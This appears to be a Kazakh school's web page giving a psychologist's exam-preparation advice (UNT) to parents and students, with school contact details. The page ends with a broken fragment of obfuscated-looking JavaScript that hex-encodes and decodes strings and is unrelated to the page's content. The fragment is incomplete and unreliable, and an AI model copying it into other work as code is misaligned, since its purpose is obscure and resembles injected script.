Сенім телефоны
601920
email: sosh26@goo.edu.kz
Мекенжайы: Павлодар қаласы, Семенченко көшесі, 70
601920, 602114, 601968
Білім бөлімінің басты бетіне қайту
Азаматтарды жеке қабылдау кестесі:
дүйсенбі 15.00 - 18.00, жұма 11.30 - 13.30
За год
За месяц
За неделю
Вчера
Ата-аналарға ұсынылатын кеңестер
Балаларыңызға сынаққа тиімді дайындалуда көмек көрсету үшін келесі кеңестерге назар аударыңыз:
  • Балаңызға түсіністікпен қарап, жақын болуға, сөйлесуге тырысыңыз. Сынамаңыз. Ұрыспаңыз;
  • Үйде дайындалу үшін балаңызға ыңғайлы жұмыс орнын жасаңыздар. Сіздің балаңыз дайындалған кезде, ешкім оған бөгет жасамасын;
  • Балаңызды ҰБТ-ға дайындалу әдістемесімен таныстырыңыз. Пәндер бойынша тестік тапсырмалардың әр түрлі нұсқаларын жаттықтырыңыз. Өйткені тестілеу балаңызға таныс ауызша мен жазбаша емтихандардан өзгеше;
  • Тестік тапсырмаларды орындаған кезде балаңызға уақытты дұрыс бөлуді үйретіңіздер. Егер балаңызда сағат болмаса, емтиханға барар алдында оған сағатты беріңіз;
 
  • Балаңызды ешкімнің баласымен салыстырмай!!! мадақтап, олардың өзіне-өзі сенімін жоғарлатыңыз;
 
  • Балаңыздың емтихандарға дайындалудың күнтізбесін бақылаңыздар. Сонша ауыртпалық түсіртпеңіз;
 
  • Балаңыздың ішетін тамағына көңіл аударыңыз. Балық, ірімшік, жаңғақ, курага және т.с.с. б ас миының жұмысын белсендіреді;
 
  • ҰБТ-ның алдында балаңыз толымды демалу үшін жағымды жағдай жасаңыздар. Өйткені ол жақсы ұйықтап, демалу қажет;
 
  • ҰБТ-дан кейін балаңызды сынға алмаңыздар және оған ашу байқатпаңыз;
Есіңізде болсын: ең бастысы және негізгісі – балаңызда ҰБТ-мен, МАБ-пен байланысты қобалжу деңгейін төмендету керек және оларға дайындалу үшін қажетті жағдайлар туғызу қажет!   Психологтің 9-11–сынып оқушыларына ҰБТ,МАБ сынағының алдындағы кеңестері: Сабақтар үшін орын дайында: үстелдің бетінен керегі жоқ заттарды алып тастап, қажетті құрал жабдықтарды, кітаптарды, тесттерді, дәптерлерді, қаламсаптарды қойыңыз;
  • Бөлменің ішіне сары немесе күлгін түстерді еңгіз. Олар ақыл-ойды белсендіреді. Ол үшін жай ғана суреттің бейнесі де жарасады;
 
  • Сабақтардың жоспарын құрастыр. Алдымен анықтаңыз: сіз кімсіз «үкі», әлде «бозторғайсыз». Кейін осыған байланысты таңғы және кешкі сағаттарды көбірек пайдалан. Әр күнге жоспар құрған кезде, «Бүгін мен нені оқуым керек», «Қандай бөлімдер және тақырыптар оқимын» сияқты нақты білу және анықтау керек;
 
  • Ең қиын немесе ең нашар білетін материалыңнан баста. Бірақ, егер саған өте қиын болса, саған жеңіл немесе қызықты көрінетін материалдан бастауға да болады;
 
  • Сабақты оқу мен демалуды реттеңдер: 40 минут сабақ оқу, кейін 10 минут демалу. Демалу кезінде ыдысты жууға, гүлдерге су құйюға, суға түсуге немесе денені шынықтыруға болады;
 
  • Берілген пәндер бойынша өте көп тесттерді шығар. Өйткені осындай жаттығулар сендерді тестік тапсырмалардың құрылымымен таныстырады;
 
  • Секундамерді қолыңда ұстап, жаттық. Тесттерді қанша уақытта жасағаныңды есепте;
 
  • Емтихандарға дайындалу кезінде өзінің жақсы тапсырғаныңынды көз алдына елестет;
 
  • «Тапсырманы орындай алмаймын», - деп ешқашан ойлама;
 
  • Ең қиын сұрақтарды қайталау үшін сынақ алдында түнді емес, бір күнді қалдыр.
Тек қана ата-аналармен бірге, жалпы күш жігерді біріктіру арқасында мұғалімдер балаларға үлкен көмек бере алады, бірігіп жұмыс жасай отырып, үлкен нәтижеге жете алады. Сондықтан сынып жетекшілердің міндеті, ата-аналарға “балаңыздың тамағының тоқтығы мен көңілінің көктігіне қарайтын, құр асыраушысы рөлінен шығып, ендігі жерде, сіздің алдыңызда балаңыздың білім алу жолындағы серіктесі болу міндетісіз” деп әр ата-ананы мектеп өміріне жақындатқан жөн. Өз ойымды қорыта келе, құрметті ұстаздар оқушыларға білім, тәрбие беруде ата-аналармен бірлік тауып,үйлесімді жұмыс жүргізілсе, тәлім-тәрбие,оқу-білім нәтижелі болады... Ата-ана үшін баланың бақытын көру, ұстаз үшін еңбегінің жемісін көруден артық бақыт жоқ!!!  

Барлығыңызға сәттілік тілеймін!!!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e